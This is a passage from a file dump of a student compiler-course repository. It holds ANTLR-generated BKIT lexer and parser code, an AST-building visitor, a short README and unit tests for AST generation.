buf.write(\"g\\3\\2\\60\\60\\3\\2))\\3\\2$$\\4\\2$$))\\5\\2\\62;CHch\\3\\2\\629\\6\")\n buf.write(\"\\2\\n\\f\\16\\17$$^^\\5\\2\\13\\f\\17\\17\\\"\\\"\\4\\3\\n\\f\\16\\17\\2\\u0126\")\n buf.write(\"\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2)\\3\")\n buf.write(\"\\2\\2\\2\\2+\\3\\2\\2\\2\\2-\\3\\2\\2\\2\\2/\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\")\n buf.write(\"A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\")\n buf.write(\"\\2K\\3\\2\\2\\2\\3N\\3\\2\\2\\2\\5^\\3\\2\\2\\2\\7a\\3\\2\\2\\2\\tg\\3\\2\\2\")\n buf.write(\"\\2\\13p\\3\\2\\2\\2\\rr\\3\\2\\2\\2\\17t\\3\\2\\2\\2\\21w\\3\\2\\2\\2\\23y\")\n buf.write(\"\\3\\2\\2\\2\\25{\\3\\2\\2\\2\\27\\u0081\\3\\2\\2\\2\\31\\u0083\\3\\2\\2\\2\")\n buf.write(\"\\33\\u008a\\3\\2\\2\\2\\35\\u0092\\3\\2\\2\\2\\37\\u009d\\3\\2\\2\\2!\\u009f\")\n buf.write(\"\\3\\2\\2\\2#\\u00a1\\3\\2\\2\\2%\\u00a3\\3\\2\\2\\2\\'\\u00a5\\3\\2\\2\\2\")\n buf.write(\")\\u00a7\\3\\2\\2\\2+\\u00a9\\3\\2\\2\\2-\\u00ab\\3\\2\\2\\2/\\u00ad\\3\")\n buf.write(\"\\2\\2\\2\\61\\u00af\\3\\2\\2\\2\\63\\u00b7\\3\\2\\2\\2\\65\\u00bf\\3\\2\")\n buf.write(\"\\2\\2\\67\\u00c7\\3\\2\\2\\29\\u00d0\\3\\2\\2\\2;\\u00d8\\3\\2\\2\\2=\\u00de\")\n buf.write(\"\\3\\2\\2\\2?\\u00e0\\3\\2\\2\\2A\\u00e8\\3\\2\\2\\2C\\u00f2\\3\\2\\2\\2\")\n buf.write(\"E\\u00f8\\3\\2\\2\\2G\\u0102\\3\\2\\2\\2I\\u0104\\3\\2\\2\\2K\\u0112\\3\")\n buf.write(\"\\2\\2\\2MO\\7$\\2\\2NM\\3\\2\\2\\2OP\\3\\2\\2\\2PN\\3\\2\\2\\2PQ\\3\\2\\2\")\n buf.write(\"\\2QX\\3\\2\\2\\2RT\\5;\\36\\2SR\\3\\2\\2\\2TW\\3\\2\\2\\2US\\3\\2\\2\\2U\")\n buf.write(\"V\\3\\2\\2\\2VY\\3\\2\\2\\2WU\\3\\2\\2\\2XU\\3\\2\\2\\2YZ\\3\\2\\2\\2ZX\\3\")\n buf.write(\"\\2\\2\\2Z[\\3\\2\\2\\2[\\\\\\3\\2\\2\\2\\\\]\\7$\\2\\2]\\4\\3\\2\\2\\2^_\\5\\21\")\n buf.write(\"\\t\\2_`\\5\\35\\17\\2`\\6\\3\\2\\2\\2ae\\5\\21\\t\\2bf\\5\\65\\33\\2cf\\5\")\n buf.write(\"\\63\\32\\2df\\5\\67\\34\\2eb\\3\\2\\2\\2ec\\3\\2\\2\\2ed\\3\\2\\2\\2f\\b\")\n buf.write(\"\\3\\2\\2\\2gm\\5? \\2hi\\5/\\30\\2ij\\5? \\2jl\\3\\2\\2\\2kh\\3\\2\\2\\2\")\n buf.write(\"lo\\3\\2\\2\\2mk\\3\\2\\2\\2mn\\3\\2\\2\\2n\\n\\3\\2\\2\\2om\\3\\2\\2\\2pq\")\n buf.write(\"\\t\\2\\2\\2q\\f\\3\\2\\2\\2rs\\t\\3\\2\\2s\\16\\3\\2\\2\\2tu\\t\\4\\2\\2u\\20\")\n buf.write(\"\\3\\2\\2\\2vx\\t\\5\\2\\2wv\\3\\2\\2\\2wx\\3\\2\\2\\2x\\22\\3\\2\\2\\2yz\\t\")\n buf.write(\"\\6\\2\\2z\\24\\3\\2\\2\\2{|\\7^\\2\\2|}\\t\\7\\2\\2}\\26\\3\\2\\2\\2~\\177\")\n buf.write(\"\\7^\\2\\2\\177\\u0082\\n\\7\\2\\2\\u0080\\u0082\\n\\b\\2\\2\\u0081~\\3\")\n buf.write(\"\\2\\2\\2\\u0081\\u0080\\3\\2\\2\\2\\u0082\\30\\3\\2\\2\\2\\u0083\\u0084\")\n buf.write(\"\\t\\t\\2\\2\\u0084\\u0086\\5\\21\\t\\2\\u0085\\u0087\\5\\17\\b\\2\\u0086\")\n buf.write(\"\\u0085\\3\\2\\2\\2\\u0087\\u0088\\3\\2\\2\\2\\u0088\\u0086\\3\\2\\2\\2\")\n buf.write(\"\\u0088\\u0089\\3\\2\\2\\2\\u0089\\32\\3\\2\\2\\2\\u008a\\u008e\\t\\n\")\n buf.write(\"\\2\\2\\u008b\\u008d\\5\\17\\b\\2\\u008c\\u008b\\3\\2\\2\\2\\u008d\\u0090\")\n buf.write(\"\\3\\2\\2\\2\\u008e\\u008c\\3\\2\\2\\2\\u008e\\u008f\\3\\2\\2\\2\\u008f\")\n buf.write(\"\\34\\3\\2\\2\\2\\u0090\\u008e\\3\\2\\2\\2\\u0091\\u0093\\5\\17\\b\\2\\u0092\")\n buf.write(\"\\u0091\\3\\2\\2\\2\\u0093\\u0094\\3\\2\\2\\2\\u0094\\u0092\\3\\2\\2\\2\")\n buf.write(\"\\u0094\\u0095\\3\\2\\2\\2\\u0095\\u009b\\3\\2\\2\\2\\u0096\\u0098\\5\")\n buf.write(\"\\33\\16\\2\\u0097\\u0099\\5\\31\\r\\2\\u0098\\u0097\\3\\2\\2\\2\\u0098\")\n buf.write(\"\\u0099\\3\\2\\2\\2\\u0099\\u009c\\3\\2\\2\\2\\u009a\\u009c\\5\\31\\r\")\n buf.write(\"\\2\\u009b\\u0096\\3\\2\\2\\2\\u009b\\u009a\\3\\2\\2\\2\\u009c\\36\\3\")\n buf.write(\"\\2\\2\\2\\u009d\\u009e\\t\\13\\2\\2\\u009e \\3\\2\\2\\2\\u009f\\u00a0\")\n buf.write(\"\\t\\f\\2\\2\\u00a0\\\"\\3\\2\\2\\2\\u00a1\\u00a2\\t\\r\\2\\2\\u00a2$\\3\")\n buf.write(\"\\2\\2\\2\\u00a3\\u00a4\\t\\16\\2\\2\\u00a4&\\3\\2\\2\\2\\u00a5\\u00a6\")\n buf.write(\"\\t\\17\\2\\2\\u00a6(\\3\\2\\2\\2\\u00a7\\u00a8\\7<\\2\\2\\u00a8*\\3\\2\")\n buf.write(\"\\2\\2\\u00a9\\u00aa\\7=\\2\\2\\u00aa,\\3\\2\\2\\2\\u00ab\\u00ac\\7\\60\")\n buf.write(\"\\2\\2\\u00ac.\\3\\2\\2\\2\\u00ad\\u00ae\\7.\\2\\2\\u00ae\\60\\3\\2\\2\")\n buf.write(\"\\2\\u00af\\u00b0\\7X\\2\\2\\u00b0\\u00b1\\7c\\2\\2\\u00b1\\u00b2\\7\")\n buf.write(\"t\\2\\2\\u00b2\\62\\3\\2\\2\\2\\u00b3\\u00b4\\7\\62\\2\\2\\u00b4\\u00b8\")\n buf.write(\"\\7z\\2\\2\\u00b5\\u00b6\\7\\62\\2\\2\\u00b6\\u00b8\\7Z\\2\\2\\u00b7\")\n buf.write(\"\\u00b3\\3\\2\\2\\2\\u00b7\\u00b5\\3\\2\\2\\2\\u00b8\\u00ba\\3\\2\\2\\2\")\n buf.write(\"\\u00b9\\u00bb\\5%\\23\\2\\u00ba\\u00b9\\3\\2\\2\\2\\u00bb\\u00bc\\3\")\n buf.write(\"\\2\\2\\2\\u00bc\\u00ba\\3\\2\\2\\2\\u00bc\\u00bd\\3\\2\\2\\2\\u00bd\\64\")\n buf.write(\"\\3\\2\\2\\2\\u00be\\u00c0\\5\\17\\b\\2\\u00bf\\u00be\\3\\2\\2\\2\\u00c0\")\n buf.write(\"\\u00c1\\3\\2\\2\\2\\u00c1\\u00bf\\3\\2\\2\\2\\u00c1\\u00c2\\3\\2\\2\\2\")\n buf.write(\"\\u00c2\\66\\3\\2\\2\\2\\u00c3\\u00c4\\7\\62\\2\\2\\u00c4\\u00c8\\7q\")\n buf.write(\"\\2\\2\\u00c5\\u00c6\\7\\62\\2\\2\\u00c6\\u00c8\\7Q\\2\\2\\u00c7\\u00c3\")\n buf.write(\"\\3\\2\\2\\2\\u00c7\\u00c5\\3\\2\\2\\2\\u00c8\\u00ca\\3\\2\\2\\2\\u00c9\")\n buf.write(\"\\u00cb\\5\\'\\24\\2\\u00ca\\u00c9\\3\\2\\2\\2\\u00cb\\u00cc\\3\\2\\2\")\n buf.write(\"\\2\\u00cc\\u00ca\\3\\2\\2\\2\\u00cc\\u00cd\\3\\2\\2\\2\\u00cd8\\3\\2\")\n buf.write(\"\\2\\2\\u00ce\\u00d1\\5\\13\\6\\2\\u00cf\\u00d1\\5\\r\\7\\2\\u00d0\\u00ce\")\n buf.write(\"\\3\\2\\2\\2\\u00d0\\u00cf\\3\\2\\2\\2\\u00d1:\\3\\2\\2\\2\\u00d2\\u00d9\")\n buf.write(\"\\n\\20\\2\\2\\u00d3\\u00d9\\5\\25\\13\\2\\u00d4\\u00d5\\5\\37\\20\\2\")\n buf.write(\"\\u00d5\\u00d6\\5!\\21\\2\\u00d6\\u00d9\\3\\2\\2\\2\\u00d7\\u00d9\\7\")\n buf.write(\"\\2\\2\\3\\u00d8\\u00d2\\3\\2\\2\\2\\u00d8\\u00d3\\3\\2\\2\\2\\u00d8\\u00d4\")\n buf.write(\"\\3\\2\\2\\2\\u00d8\\u00d7\\3\\2\\2\\2\\u00d9<\\3\\2\\2\\2\\u00da\\u00df\")\n buf.write(\"\\5)\\25\\2\\u00db\\u00df\\5+\\26\\2\\u00dc\\u00df\\5-\\27\\2\\u00dd\")\n buf.write(\"\\u00df\\5/\\30\\2\\u00de\\u00da\\3\\2\\2\\2\\u00de\\u00db\\3\\2\\2\\2\")\n buf.write(\"\\u00de\\u00dc\\3\\2\\2\\2\\u00de\\u00dd\\3\\2\\2\\2\\u00df>\\3\\2\\2\")\n buf.write(\"\\2\\u00e0\\u00e5\\5\\13\\6\\2\\u00e1\\u00e4\\5\\13\\6\\2\\u00e2\\u00e4\")\n buf.write(\"\\5\\17\\b\\2\\u00e3\\u00e1\\3\\2\\2\\2\\u00e3\\u00e2\\3\\2\\2\\2\\u00e4\")\n buf.write(\"\\u00e7\\3\\2\\2\\2\\u00e5\\u00e3\\3\\2\\2\\2\\u00e5\\u00e6\\3\\2\\2\\2\")\n buf.write(\"\\u00e6@\\3\\2\\2\\2\\u00e7\\u00e5\\3\\2\\2\\2\\u00e8\\u00ec\\7$\\2\\2\")\n buf.write(\"\\u00e9\\u00eb\\5;\\36\\2\\u00ea\\u00e9\\3\\2\\2\\2\\u00eb\\u00ee\\3\")\n buf.write(\"\\2\\2\\2\\u00ec\\u00ea\\3\\2\\2\\2\\u00ec\\u00ed\\3\\2\\2\\2\\u00ed\\u00ef\")\n buf.write(\"\\3\\2\\2\\2\\u00ee\\u00ec\\3\\2\\2\\2\\u00ef\\u00f0\\5\\27\\f\\2\\u00f0\")\n buf.write(\"B\\3\\2\\2\\2\\u00f1\\u00f3\\t\\21\\2\\2\\u00f2\\u00f1\\3\\2\\2\\2\\u00f3\")\n buf.write(\"\\u00f4\\3\\2\\2\\2\\u00f4\\u00f2\\3\\2\\2\\2\\u00f4\\u00f5\\3\\2\\2\\2\")\n buf.write(\"\\u00f5\\u00f6\\3\\2\\2\\2\\u00f6\\u00f7\\b\\\"\\2\\2\\u00f7D\\3\\2\\2\")\n buf.write(\"\\2\\u00f8\\u00fc\\7$\\2\\2\\u00f9\\u00fb\\5;\\36\\2\\u00fa\\u00f9\")\n buf.write(\"\\3\\2\\2\\2\\u00fb\\u00fe\\3\\2\\2\\2\\u00fc\\u00fa\\3\\2\\2\\2\\u00fc\")\n buf.write(\"\\u00fd\\3\\2\\2\\2\\u00fd\\u0100\\3\\2\\2\\2\\u00fe\\u00fc\\3\\2\\2\\2\")\n buf.write(\"\\u00ff\\u0101\\t\\22\\2\\2\\u0100\\u00ff\\3\\2\\2\\2\\u0101F\\3\\2\\2\")\n buf.write(\"\\2\\u0102\\u0103\\13\\2\\2\\2\\u0103H\\3\\2\\2\\2\\u0104\\u0105\\7,\")\n buf.write(\"\\2\\2\\u0105\\u0106\\7,\\2\\2\\u0106\\u010a\\3\\2\\2\\2\\u0107\\u0109\")\n buf.write(\"\\13\\2\\2\\2\\u0108\\u0107\\3\\2\\2\\2\\u0109\\u010c\\3\\2\\2\\2\\u010a\")\n buf.write(\"\\u010b\\3\\2\\2\\2\\u010a\\u0108\\3\\2\\2\\2\\u010b\\u010d\\3\\2\\2\\2\")\n buf.write(\"\\u010c\\u010a\\3\\2\\2\\2\\u010d\\u010e\\7,\\2\\2\\u010e\\u010f\\7\")\n buf.write(\",\\2\\2\\u010f\\u0110\\3\\2\\2\\2\\u0110\\u0111\\b%\\3\\2\\u0111J\\3\")\n buf.write(\"\\2\\2\\2\\u0112\\u0113\\7,\\2\\2\\u0113\\u0114\\7,\\2\\2\\u0114\\u0118\")\n buf.write(\"\\3\\2\\2\\2\\u0115\\u0117\\13\\2\\2\\2\\u0116\\u0115\\3\\2\\2\\2\\u0117\")\n buf.write(\"\\u011a\\3\\2\\2\\2\\u0118\\u0119\\3\\2\\2\\2\\u0118\\u0116\\3\\2\\2\\2\")\n buf.write(\"\\u0119\\u011b\\3\\2\\2\\2\\u011a\\u0118\\3\\2\\2\\2\\u011b\\u011c\\7\")\n buf.write(\"\\2\\2\\3\\u011cL\\3\\2\\2\\2\\37\\2PUZemw\\u0081\\u0088\\u008e\\u0094\")\n buf.write(\"\\u0098\\u009b\\u00b7\\u00bc\\u00c1\\u00c7\\u00cc\\u00d0\\u00d8\")\n buf.write(\"\\u00de\\u00e3\\u00e5\\u00ec\\u00f4\\u00fc\\u0100\\u010a\\u0118\")\n buf.write(\"\\4\\b\\2\\2\\2\\3\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n STRING = 1\n Real_number = 2\n Integer_number = 3\n Ids_list = 4\n COLON = 5\n SEMI = 6\n DOT = 7\n COMMA = 8\n VAR = 9\n ILLEGAL_ESCAPE = 10\n WS = 11\n UNCLOSE_STRING = 12\n ERROR_CHAR = 13\n BLOCK_COMMENT = 14\n UNTERMINATED_COMMENT = 15\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"':'\", \"';'\", \"'.'\", \"','\", \"'Var'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"STRING\", \"Real_number\", \"Integer_number\", \"Ids_list\", \"COLON\", \n \"SEMI\", \"DOT\", \"COMMA\", \"VAR\", \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \n \"ERROR_CHAR\", \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n ruleNames = [ \"STRING\", \"Real_number\", \"Integer_number\", \"Ids_list\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"SIGN\", \n \"SPACE\", \"ESCAPE_SEQUENCE\", \"ESCAPE_ILLEGAL\", \"SCIENTIFIC\", \n \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \"SING_QUOTE\", \"DOUBLE_QUOTE\", \n \"DOUBLE_QUOTE_IN_QUOTE\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \n \"COLON\", \"SEMI\", \"DOT\", \"COMMA\", \"VAR\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"LETTER\", \"STRING_CHAR\", \"PUNCTUATION\", \n \"ID\", \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \"ERROR_CHAR\", \n \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n num_tokens = 0\n\n\n" }, { "alpha_fraction": 0.6557971239089966, "alphanum_fraction": 0.6702898740768433, "avg_line_length": 15.235294342041016, "blob_id": "46765cc998eb138e5bd9c3bcd38b1247ae095346", "content_id": "8ba9a376a9a4119e9373f746b36719bcfad2bcb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 276, "license_type": "no_license", "max_line_length": 51, "num_lines": 17, "path": "/README.md", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Principle of Programming Language\n## With Lab\nModified your grammer in ``file_name.g4``.\nRun:\n```bash\n./gen.sh file_name\n```\nTo clean your ``work_dir``:\n```bash\n./clean.sh\n```\n\n## Note\nIn case you do not have permission to run the file:\n```bash\nsudo chmod 777 file_name\n```\n" }, { "alpha_fraction": 0.6180607080459595, "alphanum_fraction": 0.6243523359298706, "avg_line_length": 38.75, "blob_id": "425454bd03261b5445a8b4e9135cff2035e8b45e", "content_id": "edbd214f58ab97e2a70e638c1ddd8d7501801d18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2702, "license_type": "no_license", "max_line_length": 146, "num_lines": 68, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return self.visitExp(ctx.exp())\n\n# def visitExp(self,ctx:MPParser.ExpContext):\n# if ctx.ASSIGN():\n# return reduce(lambda rh,lh: Binary(ctx.ASSIGN(0).getText(), lh, rh), list(map(lambda term: self.visitTerm(term), ctx.term()))[::-1])\n# return self.visitTerm(ctx.term(0))\n\n# def visitTerm(self,ctx:MPParser.TermContext):\n# if ctx.COMPARE():\n# return Binary(ctx.COMPARE().getText(), self.visitFactor(ctx.factor(0)), self.visitFactor(ctx.factor(1)))\n# else:\n# return self.visitFactor(ctx.factor(0))\n\n# def visitFactor(self,ctx:MPParser.FactorContext):\n# if ANDOR():\n# return reduce(lambda rh,lh: Binary(ctx.ANDOR(0).getText(), rh, lh), list(map(lambda op: self.visitOperand(op), ctx.operand())))\n# return self.visitOperand(ctx.operand(0))\n\n# def visitOperand(self,ctx:MPParser.OperandContext):\n# if ctx.INTLIT():\n# return IntLiteral(int(ctx.INTLIT().getText()))\n\n# if ctx.BOOLIT():\n# return BooleanLiteral(bool(ctx.BOOLIT().getText()))\n \n# if ctx.ID():\n# return Id(ctx.ID().getText())\n \n# return self.visitExp(ctx.exp())\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\nfrom functools import reduce\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n return self.visitExp(ctx.exp())\n\n def visitExp(self,ctx:BKITParser.ExpContext):\n if ctx.ASSIGN():\n return reduce(lambda rh,lh: Binary(ctx.ASSIGN(0).getText(), lh, rh), list(map(lambda term: self.visitTerm(term), ctx.term()))[::-1])\n return self.visitTerm(ctx.term(0))\n\n def visitTerm(self,ctx:BKITParser.TermContext): \n if ctx.COMPARE():\n return Binary(ctx.COMPARE().getText(), self.visitFactor(ctx.factor(0)), self.visitFactor(ctx.factor(1)))\n return self.visitFactor(ctx.factor(0))\n\n def visitFactor(self,ctx:BKITParser.FactorContext):\n if ANDOR(0):\n return reduce(lambda lh,rh: Binary(ctx.ANDOR(0).getText(), lh, rh), list(map(lambda op: self.visitOperand(op), ctx.operand())))\n return self.visitOperand(ctx.operand(0))\n\n def visitOperand(self,ctx:BKITParser.OperandContext): \n if ctx.INTLIT():\n return IntLiteral(int(ctx.INTLIT().getText()))\n\n if ctx.BOOLIT():\n return BooleanLiteral(bool(ctx.BOOLIT().getText()))\n \n if ctx.ID():\n return Id(ctx.ID().getText())\n \n return self.visitExp(ctx.exp())" }, { "alpha_fraction": 0.5820682048797607, "alphanum_fraction": 0.612718403339386, "avg_line_length": 27.341463088989258, "blob_id": "f80210813bc6008779b37cb4ce9f64a29d161347", "content_id": "67128664176deb4aea6831f92c7bc1a99e9c4045", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3491, "license_type": "no_license", "max_line_length": 103, "num_lines": 123, "path": "/target/LexicalAnalysisParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from LexicalAnalysis.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\4\")\n buf.write(\"\\13\\4\\2\\t\\2\\4\\3\\t\\3\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\2\\2\\4\\2\\4\\2\\2\")\n buf.write(\"\\2\\b\\2\\6\\3\\2\\2\\2\\4\\b\\3\\2\\2\\2\\6\\7\\3\\2\\2\\2\\7\\3\\3\\2\\2\\2\\b\")\n buf.write(\"\\t\\7\\3\\2\\2\\t\\5\\3\\2\\2\\2\\2\")\n return buf.getvalue()\n\n\nclass LexicalAnalysisParser ( Parser ):\n\n grammarFileName = \"LexicalAnalysis.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"WS\" ]\n\n RULE_program = 0\n RULE_letter = 1\n\n ruleNames = [ \"program\", \"letter\" ]\n\n EOF = Token.EOF\n ID=1\n WS=2\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return LexicalAnalysisParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = LexicalAnalysisParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class LetterContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(LexicalAnalysisParser.ID, 0)\n\n def getRuleIndex(self):\n return LexicalAnalysisParser.RULE_letter\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitLetter\" ):\n return visitor.visitLetter(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def letter(self):\n\n localctx = LexicalAnalysisParser.LetterContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_letter)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 6\n self.match(LexicalAnalysisParser.ID)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.467327743768692, "alphanum_fraction": 0.4940249025821686, "avg_line_length": 33.81415939331055, "blob_id": "d0abc64fe9ecdf932d81185af4dfbc5c421c3c1c", "content_id": "85f29a479223c2c74cc21b9f2f3440a6efc188b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3933, "license_type": "no_license", "max_line_length": 284, "num_lines": 113, "path": "/Assignments/assignment2/src1.0/test/ASTGenSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestAST\nfrom AST import *\n\nclass ASTGenSuite(unittest.TestCase):\n def test_simple_program(self):\n \"\"\"Simple program: int main() {} \"\"\"\n input = \"\"\"Var:x;\"\"\"\n expect = Program([VarDecl(Id(\"x\"),[],None)])\n self.assertTrue(TestAST.checkASTGen(input,expect,300))\n\n def test_var_decl_1(self):\n input = \"\"\"Var:x = 1;\"\"\"\n expect = Program([VarDecl(Id(\"x\"),[],IntLiteral(1))])\n self.assertTrue(TestAST.checkASTGen(input,expect,301))\n \n def test_var_decl_2(self):\n input = \"\"\"Var:x = 1, y;\"\"\"\n expect = Program([VarDecl(Id('y'), [], None),VarDecl(Id('x'),[],IntLiteral(1))])\n self.assertTrue(TestAST.checkASTGen(input,expect,302))\n\n def test_var_decl_3(self):\n input = \"\"\"Var:x = 1, y = \"abc\", z = 1e2, l=True, a[1][2]={{1},{2}};\"\"\"\n expect = Program([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],StringLiteral('abc')),VarDecl(Id('z'),[],FloatLiteral(100.0)),VarDecl(Id('l'),[],BooleanLiteral('True')),VarDecl(Id('a'),[1,2],ArrayLiteral([ArrayLiteral([IntLiteral(1)]),ArrayLiteral([IntLiteral(2)])]))])\n self.assertTrue(TestAST.checkASTGen(input,expect,303))\n\n def test_var_decl_4(self):\n input = \"\"\"Var:x[1] = {1};\"\"\"\n expect = Program([VarDecl(Id(\"x\"),[1],ArrayLiteral([IntLiteral(1)]))])\n self.assertTrue(TestAST.checkASTGen(input,expect,304))\n\n def test_var_decl_10(self): \n input = \"\"\"Var:x[1] = {1,2,3,4};\"\"\"\n expect = Program([VarDecl(Id(\"x\"),[1],ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3),IntLiteral(4)]))])\n self.assertTrue(TestAST.checkASTGen(input,expect,310))\n \n def test_func_decl_1(self):\n input = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n EndBody.\"\"\"\n\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,311))\n \n def test_func_decl_2(self):\n input = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n EndBody.\n Function: foo\n Parameter: a,b,c[1]\n Body:\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,312))\n\n def test_func_decl_3(self):\n input = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var:x = 1, y;\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,313))\n\n def test_if_stmt_1(self):\n input = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + a - b * foo() > 1 Then\n EndIf.\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,321))\n\n\n def test_if_stmt_2(self):\n input = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 Then\n EndIf.\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,322))\n\n def test_if_stmt_3(self):\n input = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + 1 Then\n EndIf.\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,323))\n\n def test_for_stmt_1(self):\n input = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + 1 Then\n For (i=1,i>1,1+2) Do\n Var: a=10,c[1]={1,2};\n c[foo() + 1] = a;\n EndFor. \n EndIf.\n EndBody.\"\"\"\n expect = None\n self.assertTrue(TestAST.checkASTGen(input,expect,331))" }, { "alpha_fraction": 0.5057029724121094, "alphanum_fraction": 0.5516846179962158, "avg_line_length": 32.09162902832031, "blob_id": "8b079b87f5fa6d103813da5112c6b3f1f24437bd", "content_id": "52253e887361a479de6ac028c675b664485c8f56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41908, "license_type": "no_license", "max_line_length": 165, "num_lines": 1266, "path": "/SyntaxAnalysis/tut/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\36\")\n 